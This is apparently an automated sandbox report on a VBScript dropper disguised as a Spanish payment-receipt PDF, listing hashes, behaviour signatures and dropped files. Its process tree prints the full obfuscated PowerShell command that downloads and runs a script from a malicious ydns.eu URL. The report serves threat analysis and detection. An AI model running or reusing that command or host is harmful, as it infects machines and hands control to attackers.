051bc8ae84b32374b0b3372aecb972f2b41a8626e302ea18e6178933ecfecb22

General

Target

JUSTIFICANTE DE PAGO,pdf.vbs
Size

722B
MD5

04e47e5f5b9f59e48c54939992252fd9
SHA1

5b3d989972677faf61eb5aadb194fc441a93a1ab
SHA256

051bc8ae84b32374b0b3372aecb972f2b41a8626e302ea18e6178933ecfecb22
SHA512

08c7de2e1530551a3b32c4d88ce56f1d4031c7f05d8e5bfd0de1d5d8edaada46f9d1b8dc89beeb58a29710b579c4732dfb400fc6ccb36e838335188b60ab93f8

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1288	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1288	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1288	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 996 wrote to memory of 1288	996	WScript.exe	27
PID 996 wrote to memory of 1288	996	WScript.exe	27
PID 996 wrote to memory of 1288	996	WScript.exe	27
PID 1288 wrote to memory of 1704	1288	powershell.exe	29
PID 1288 wrote to memory of 1704	1288	powershell.exe	29
PID 1288 wrote to memory of 1704	1288	powershell.exe	29
PID 1704 wrote to memory of 652	1704	csc.exe	30
PID 1704 wrote to memory of 652	1704	csc.exe	30
PID 1704 wrote to memory of 652	1704	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JUSTIFICANTE DE PAGO,pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec ByPaSs -C i`Ex(nE`w-OBj`ecT ('N'+'et.Webcl'+'ie'+'nt')).('Do'+'wn'+'loadStri'+'ng').Invoke('http://khghfsaguvtyrioukjhgfydfgbhnyjhbgvdcertrtbgnhhbjctryvbgnhmihgyr.ydns.eu/qazxswedcvfrtgbnhyujm/waswaswaswa.ps1')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmzsoht9.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1704
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AAB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2AAA.tmp"
      4⤵
      PID:652

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2AAB.tmp

Filesize
1KB

MD5
c0cd503c244ab4707ef1214dc57da575

SHA1
761c480fa8e75041c728a52e3b6e4f8261446a36

SHA256
b561d4b3ec7306633b3c50fb984043b5f15dd4a9fbfcc3fdfb00cb016f960222

SHA512
a924c0a46d7fcc3bc3de8c72cdefa2b8fab5a05445feae2e953a03727fd7c05d550306b497d6ed57777cf52f4550d6561d99be718948c8fdf8d50aec0dc12709

Download Submit
C:\Users\Admin\AppData\Local\Temp\kmzsoht9.dll

Filesize
5KB

MD5
9cd187559f96a6b66c480bd47b498264

SHA1
50ee52495f8386cc867a4ffc0ebf893824812464

SHA256
54d0806d45881da27560289d011df3491ad53d2ce438ecee29c0b65f6f475a39

SHA512
1faa5dace83f7c45a884c16ae5513f6abde32a95cd49645a78878791bcf1006997a2d51e10f5bca74cabfd4440ebbab217894c3b0195d86c3445a71de30a2676

Download Submit
C:\Users\Admin\AppData\Local\Temp\kmzsoht9.pdb

Filesize
11KB

MD5
5f422fc5116b358fe6a5b3f30f7e3150

SHA1
cf1e91ebc729e1b45019cf2feed5b736b3ddd35a

SHA256
bbe9aaa5f749dc340e4cf7390bb4f32b24aa3e1391564a8f85f4cde3976a6d03

SHA512
afd0f427660d824668f9d5a127a6d3858e0f6ba617121a069f61aa546a1fd5672cb20708296cd91a1e2b2b97ac0e4f04797ac4b932ab856db0fab48bdc849b08

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2AAA.tmp

Filesize
652B

MD5
cc7555159f94b6dd1b2bdb16166c809b

SHA1
6591cbc1092544900c7aecdf9ffeda1130aafc42

SHA256
6d14fe90478f8dd8b7238ef69b8bffba2523733013d126f224509fca3e292de6

SHA512
a356ad102bdc88ebfc08eb09a0f4847a443ec73f07c68e798ba6be4d0b01cac943d11c15dc5f38c8dae8c36881d11e7fe319117cd5b168e92429d36955eb04fa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kmzsoht9.0.cs

Filesize
1KB

MD5
2d821e64622bd1c7e8d9cbd7906d7e93

SHA1
44ce279eee1ac333c09cee731432dbd79fd735a7

SHA256
95690250100bb794cb88e93bcbf58994745ed7985f7370146ecf4b78514813ac

SHA512
82d0741913eb7ac945008a613bb5e11047db3b20a3bfbc6d50b7ef6350965854d7f8576998012000f8661df149f67e38123269bc352bcc72488a5988afd17980

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kmzsoht9.cmdline

Filesize
309B

MD5
1c8c803c95890e4a52cf379796fd7586

SHA1
092092b0ec77455a26f7cc3483aa1a7ad289f59e

SHA256
273cd542f0da9975d30c5cea09396853bbc0480fb2add38329e32e445853ee4d

SHA512
1cb45895811a99ceb4f897794aee8df480d28283814256e2f56000dc6a81fbfce48278e6617f1b87d91e3b2ca8147fe6636d24e8a568789d814c357bcccc3ed1

Download Submit
memory/996-54-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

Filesize
8KB

Download
memory/1288-60-0x000000000295B000-0x000000000297A000-memory.dmp

Filesize
124KB

Download
memory/1288-58-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

Filesize
11.4MB

Download
memory/1288-59-0x0000000002954000-0x0000000002957000-memory.dmp

Filesize
12KB

Download
memory/1288-57-0x000007FEF3890000-0x000007FEF42B3000-memory.dmp

Filesize
10.1MB

Download
memory/1288-69-0x0000000002954000-0x0000000002957000-memory.dmp

Filesize
12KB

Download
memory/1288-70-0x000000000295B000-0x000000000297A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing